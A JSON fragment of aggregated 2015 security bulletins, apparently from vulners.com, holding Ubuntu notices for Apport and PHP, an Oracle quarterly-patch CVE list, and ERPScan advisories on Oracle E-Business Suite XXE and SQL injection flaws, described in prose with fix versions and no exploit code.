debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. (CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4849"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "PHAR extension DoS.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14753", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "title": "PHP security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) High (H)\r\nAu : Authentication (Level of authentication needed to exploit) Single (S)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions (afamexts.sql) does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password (for example,\r\ndefault password APPS/APPS), he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}
